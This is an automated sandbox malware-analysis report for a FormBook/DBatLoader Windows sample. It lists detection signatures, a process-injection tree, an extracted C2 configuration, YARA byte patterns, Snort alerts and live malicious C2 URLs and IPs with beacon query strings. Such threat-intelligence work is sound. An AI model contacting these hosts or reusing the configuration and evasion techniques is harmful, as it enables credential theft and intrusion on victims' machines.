Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fpopgapwdcgvxn.exe

Overview

General Information

Sample Name:Fpopgapwdcgvxn.exe
Analysis ID:1350545
MD5:072d323c28e7ba4d63eb7df9894f33c9
SHA1:cf6a2b1ba98bf303e93b4070919ec1cd30262377
SHA256:d164c7ce3856705552a7dcd91f577c12162d5eb522153e33e91f86536cac5fb2
Tags:exeFormbookmodiloader
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected DBatLoader
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Allocates many large memory junks
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to record screenshots
Contains functionality to check if a connection to the internet is available
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Fpopgapwdcgvxn.exe (PID: 2268 cmdline: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe MD5: 072D323C28E7BA4D63EB7DF9894F33C9)
    • colorcpl.exe (PID: 5112 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 6708 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 5196 cmdline: /c del "C:\Windows\SysWOW64\colorcpl.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Telragab.PIF (PID: 4780 cmdline: "C:\Users\Public\Libraries\Telragab.PIF" MD5: 072D323C28E7BA4D63EB7DF9894F33C9)
          • colorcpl.exe (PID: 6928 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
        • Telragab.PIF (PID: 368 cmdline: "C:\Users\Public\Libraries\Telragab.PIF" MD5: 072D323C28E7BA4D63EB7DF9894F33C9)
          • SndVol.exe (PID: 1016 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
          • WerFault.exe (PID: 5780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • chkdsk.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hivaom.top/ao65/"], "decoy": ["spins2023.pro", "foodontario.com", "jsnmz.com", "canwealljustagree.com", "shopthedivine.store", "thelakahealth.com", "kuis-raja-borong.website", "hbqc2.com", "optimusvisionlb.com", "urdulatest.com", "akhayarplus.com", "info-antai-service.com", "kermisbedrijfkramer.online", "epansion.com", "gxqingmeng.top", "maltsky.net", "ictwath.com", "sharmafootcare.com", "mycheese.net", "portfoliotestkitchen.com", "gwhi13.cfd", "fuzzybraintrivia.com", "thnkotb.com", "merchdojacat.com", "1techtrendzstore.com", "cnkclaw.net", "xsslm888.com", "musecheng.net", "flowandfield.online", "somdevista.com", "baissm.top", "xn--88-uqi1dtk.com", "cewra.com", "stellarskyline.com", "mbutunerfitness.com", "ssongg13916.cfd", "sprockettrucking.com", "boonts.cfd", "oaistetic.com", "enfejbazi1sjrttrsjegfwafe.click", "you-can-too.com", "chamdiemcchc.com", "mrgdistilling.info", "yptv1.com", "ecofare.xyz", "ouxodb001.cfd", "sdymavillageculturehouse.com", "carbolife.net", "iokgw1.top", "harmonicod.com", "bbpinata.com", "grfngr.design", "colibriinvest.com", "infossphere.space", "glistenbeautylounge.com", "paysprinters.online", "ruhaniiyat.com", "leathfortexas.com", "tuesdayfolder.com", "autoinsurancebound.com", "scwanguan.fun", "darkcreamslivki.xyz", "0qtqg.com", "ycth3hhtkd.asia"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fpopgapwdcgvxn.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\Libraries\Telragab.PIFJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 67 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.colorcpl.exe.68b0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            3.2.colorcpl.exe.68b0000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.colorcpl.exe.68b0000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              3.2.colorcpl.exe.68b0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              3.2.colorcpl.exe.68b0000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x17a09:$sqlite3step: 68 34 1C 7B E1
              • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
              • 0x17a38:$sqlite3text: 68 38 2A 90 C5
              • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
              • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 29 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.63.33.130.19049750802031412 11/30/23-14:58:44.521868
              SID:2031412
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.6104.247.81.5049751802031412 11/30/23-14:59:05.034219
              SID:2031412
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.6104.140.89.2449749802031412 11/30/23-14:58:24.506470
              SID:2031412
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.662.72.50.8849753802031412 11/30/23-14:59:45.996751
              SID:2031412
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.634.93.103.3949748802031412 11/30/23-14:58:03.063025
              SID:2031412
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.637.97.254.2749752802031412 11/30/23-14:59:25.599111
              SID:2031412
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.63.33.130.19049747802031412 11/30/23-14:57:23.481544
              SID:2031412
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://www.harmonicod.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.canwealljustagree.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.ecofare.xyz/ao65/Avira URL Cloud: Label: phishing
              Source: http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.comAvira URL Cloud: Label: malware
              Source: http://www.optimusvisionlb.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.kermisbedrijfkramer.onlineAvira URL Cloud: Label: phishing
              Source: http://www.sprockettrucking.com/ao65/www.leathfortexas.comAvira URL Cloud: Label: malware
              Source: http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: malware
              Source: http://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: malware
              Source: http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.websiteAvira URL Cloud: Label: malware
              Source: http://www.hivaom.top/ao65/www.canwealljustagree.comAvira URL Cloud: Label: phishing
              Source: http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.comAvira URL Cloud: Label: malware
              Source: http://www.1techtrendzstore.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: malware
              Source: http://www.optimusvisionlb.com/ao65/www.maltsky.netAvira URL Cloud: Label: malware
              Source: www.hivaom.top/ao65/Avira URL Cloud: Label: phishing
              Source: http://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: malware
              Source: http://www.stellarskyline.com/ao65/www.hivaom.topAvira URL Cloud: Label: malware
              Source: http://www.leathfortexas.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.hivaom.top/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: phishing
              Source: http://www.kermisbedrijfkramer.online/ao65/Avira URL Cloud: Label: malware
              Source: http://www.kuis-raja-borong.website/ao65/Avira URL Cloud: Label: malware
              Source: http://www.hivaom.top/ao65/Avira URL Cloud: Label: phishing
              Source: http://www.kuis-raja-borong.website/ao65/www.oaistetic.comAvira URL Cloud: Label: malware
              Source: http://www.harmonicod.com/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: malware
              Source: http://www.sprockettrucking.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.canwealljustagree.comAvira URL Cloud: Label: malware
              Source: http://www.maltsky.net/ao65/www.thnkotb.comAvira URL Cloud: Label: malware
              Source: http://www.ecofare.xyz/ao65/www.iokgw1.topAvira URL Cloud: Label: phishing
              Source: http://www.oaistetic.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.leathfortexas.com/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgPAvira URL Cloud: Label: malware
              Source: http://www.stellarskyline.com/ao65/Avira URL Cloud: Label: malware
              Source: http://www.canwealljustagree.com/ao65/www.ecofare.xyzAvira URL Cloud: Label: malware
              Source: http://www.leathfortexas.com/ao65/www.ouxodb001.cfdAvira URL Cloud: Label: malware
              Source: http://www.maltsky.net/ao65/Avira URL Cloud: Label: malware
              Source: http://www.thnkotb.com/ao65/www.harmonicod.comAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hivaom.top/ao65/"], "decoy": ["spins2023.pro", "foodontario.com", "jsnmz.com", "canwealljustagree.com", "shopthedivine.store", "thelakahealth.com", "kuis-raja-borong.website", "hbqc2.com", "optimusvisionlb.com", "urdulatest.com", "akhayarplus.com", "info-antai-service.com", "kermisbedrijfkramer.online", "epansion.com", "gxqingmeng.top", "maltsky.net", "ictwath.com", "sharmafootcare.com", "mycheese.net", "portfoliotestkitchen.com", "gwhi13.cfd", "fuzzybraintrivia.com", "thnkotb.com", "merchdojacat.com", "1techtrendzstore.com", "cnkclaw.net", "xsslm888.com", "musecheng.net", "flowandfield.online", "somdevista.com", "baissm.top", "xn--88-uqi1dtk.com", "cewra.com", "stellarskyline.com", "mbutunerfitness.com", "ssongg13916.cfd", "sprockettrucking.com", "boonts.cfd", "oaistetic.com", "enfejbazi1sjrttrsjegfwafe.click", "you-can-too.com", "chamdiemcchc.com", "mrgdistilling.info", "yptv1.com", "ecofare.xyz", "ouxodb001.cfd", "sdymavillageculturehouse.com", "carbolife.net", "iokgw1.top", "harmonicod.com", "bbpinata.com", "grfngr.design", "colibriinvest.com", "infossphere.space", "glistenbeautylounge.com", "paysprinters.online", "ruhaniiyat.com", "leathfortexas.com", "tuesdayfolder.com", "autoinsurancebound.com", "scwanguan.fun", "darkcreamslivki.xyz", "0qtqg.com", "ycth3hhtkd.asia"]}
              Multi AV Scanner detection for submitted file
              Source: Fpopgapwdcgvxn.exeReversingLabs: Detection: 70%
              Source: Fpopgapwdcgvxn.exeVirustotal: Detection: 69%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Multi AV Scanner detection for domain / URL
              Source: leathfortexas.comVirustotal: Detection: 10%Perma Link
              Source: www.maltsky.netVirustotal: Detection: 6%Perma Link
              Source: kermisbedrijfkramer.onlineVirustotal: Detection: 8%Perma Link
              Source: stellarskyline.comVirustotal: Detection: 5%Perma Link
              Source: http://www.canwealljustagree.com/ao65/Virustotal: Detection: 10%Perma Link
              Source: http://www.leathfortexas.com/ao65/Virustotal: Detection: 5%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\Telragab.PIFReversingLabs: Detection: 70%
              Machine Learning detection for sample
              Source: Fpopgapwdcgvxn.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Libraries\Telragab.PIFJoe Sandbox ML: detected
              Source: Fpopgapwdcgvxn.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: Binary string: chkdsk.pdbGCTL source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdbGCTL source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: chkdsk.pdb source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032B5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5C18
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop esi3_2_068C72DC

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 37.97.254.27 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 62.72.50.88 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 156.237.159.158 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.140.89.24 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.247.81.50 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 34.93.103.39 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
